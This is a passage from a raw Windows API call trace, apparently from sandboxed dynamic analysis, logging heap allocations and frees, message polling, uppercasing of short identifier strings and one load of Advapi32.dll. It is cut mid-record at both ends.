lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.772] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.772] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.772] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.773] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.773] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.774] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.774] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.774] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.777] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.778] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.778] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.778] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0198.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.779] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.780] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.780] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.781] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.781] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.782] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0198.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 